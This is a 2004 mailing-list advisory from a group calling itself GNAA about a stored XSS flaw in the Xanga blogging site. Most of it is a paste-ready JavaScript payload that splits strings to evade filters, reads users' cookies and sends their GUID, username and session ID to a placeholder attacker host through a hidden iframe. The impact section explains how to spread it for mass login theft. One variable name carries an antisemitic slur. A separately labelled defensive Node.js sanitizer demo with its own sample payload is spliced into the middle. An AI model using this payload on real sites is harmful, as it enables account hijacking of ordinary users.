Message-ID: <affebc6f050101174614ecea28@mail.gmail.com>
From: gerryniger at gmail.com (gnaa/rkz)
Subject: Xanga Cookie Stealing Vulnerability XSS - GNAA
Security Center
Vendor: Xanga
URL: http://www.xanga.com/
Versions: Current
Remote: Yes
Vendor notified: 06 Oct 2004 at 14:08
Vendor response: NONE
Summary:
~~~~~~~
Xanga is a fully featured blogging system. It gives users
extensive control over the look and feel of their blogs by
allowing raw HTML with only basic checks.
Xanga has well over 2.5 million users and millions
of page views every hour.
A security vulnerability in the current system
allows malicious users to steal session cookies.
===================================
Example Code:
~~~~~~~~~~~~~~~~~~~~~~~~
Pre-reqs:
* Create an Account, this does not require a valid email.
1. Click Look & Feel on the lefthand navigation bar
2. In the "Insert your own HTML" box enter the following code.
~~~~~~~~~~~~CUT AFTER HERE~~~~~~~~~~~~~~~~~
<script>
var gt = "<";
var e1 = "scr";
var e2 = "ipt";
var lt = ">";
var if1 = "ifr";
var if2 = "ame";
document.write(gt + e1 + e2 + lt);
document.write("var jewsdidwtc = documen");
document.write("t.cook");
document.write("ie.split(\';\');");
document.write("<\/script>");
// WRITE COOKIE TO TOP OF SCREEN.
document.write(jewsdidwtc);
var quot = '"'
// THE FOLLOWING CODE DEMONSTRATES HOW
// TO STEAL THE COOKIE, "SOMESITE" SHOULD
// BE A SITE WHERE YOU CAN TAIL THE LOGS
// OR MAYBE WRITE A SPECIFIC SCRIPT TO
// CAPTURE THE ARGUMENTS PROVIDED
var url = "http://SOMEWEBSITE/";
document.write(gt + if1 + if2);
document.write(" src=" + url + "?guid=");
// --- get guid ---
var GUID = "GUID=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(GUID) == 0) var GUIDval = c.substring(GUID.length,c.length);
}
// --- get username ---
var USER = "u=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(USER) == 0) var USERval = c.substring(USER.length,c.length);
}
// --- get sessionid ---
var SESS = "x=";
for(var i=0;i < jewsdidwtc.length;i++)
{
var c = jewsdidwtc[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(SESS) == 0) var SESSval = c.substring(SESS.length,c.length);
}
document.write(GUIDval);
document.write("&u=" + USERval);
document.write("&x=" + SESSval);
document.write(quot);
document.write(" WIDTH=1 HEIGHT=1" + lt);
</script>
~~~~~~~~~~~~END CUT HERE~~~~~~~~~~~~~~~~~
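As an added example (not part of the advisory), the following Node.js script contrasts a token blocklist of the kind the split-string payload above is built to evade with an allowlist sanitizer that never emits a script element at all. The sample payload and the EXAMPLE.invalid host are constructed for the demonstration and are not the advisory's code.

```javascript
// Constructed sample modelled on the advisory's payload: the sensitive tokens
// "document.cookie" and "<iframe" never appear as contiguous strings, so a
// check that looks for them verbatim has nothing to match.
const SAMPLE_PAYLOAD = [
  '<b>my blog</b>',
  '<script>',
  'var gt = "<", if1 = "ifr", if2 = "ame";',
  'document.write("var c = documen"); document.write("t.cookie;");',
  'document.write(gt + if1 + if2 + " src=http://EXAMPLE.invalid/?c=" + c + ">");',
  '</script>',
].join('\n');

// Blocklist check: rejects input only if a forbidden token appears verbatim.
// This is the "basic check" model; it is defeated by runtime string assembly.
const FORBIDDEN = ['document.cookie', '<iframe', 'onload='];
function blocklistRejects(html) {
  const lower = html.toLowerCase();
  return FORBIDDEN.some((tok) => lower.includes(tok));
}

// Allowlist sanitizer: HTML-escape everything, then re-enable a fixed set of
// harmless, attribute-free tags. Anything else, <script> included, is rendered
// as inert text, so whatever the script would have assembled never executes.
const ALLOWED_TAGS = ['b', 'i', 'u', 'p', 'br'];
function allowlistSanitize(html) {
  const escaped = html
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
  const tagRe = new RegExp(`&lt;(\\/?)(${ALLOWED_TAGS.join('|')})&gt;`, 'gi');
  return escaped.replace(tagRe, '<$1$2>');
}

// True when no executable script element survives sanitization.
function isNeutralized(html) {
  return !/<script\b/i.test(allowlistSanitize(html));
}

console.log('blocklist rejects payload:', blocklistRejects(SAMPLE_PAYLOAD));
console.log('allowlist neutralizes payload:', isNeutralized(SAMPLE_PAYLOAD));
console.log(allowlistSanitize(SAMPLE_PAYLOAD));
```

The blocklist reports the payload as clean while the allowlist output keeps the `<b>` markup and turns the script element into plain text; cookies flagged HttpOnly would additionally keep `document.cookie` from reading the session value even if a script did run.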
=========================================
Impact:
~~~~~
This code only shows how to steal session cookies; it might
seem that getting hits to a malicious user's blog would be quite
hard. This is not the case. When combined with existing Xanga
exploits:
1. http://homepage.ntlworld.com/allencastro/autoreg.gnaa
2. http://homepage.ntlworld.com/allencastro/xanga.gnaa
it could potentially generate thousands of hits and even become
featured on Xanga's front page (due to the popularity of the page),
meaning the attacker could get thousands of logins in a
few hours.
Vendor:
~~~~~
Vendor was informed months ago but we have received no reply.
Credits:
~~~~~
K5 Article on Xanga: http://www.kuro5hin.org/story/2004/12/28/161214/43
The GNAA Security Team: http://www.gnaa.us/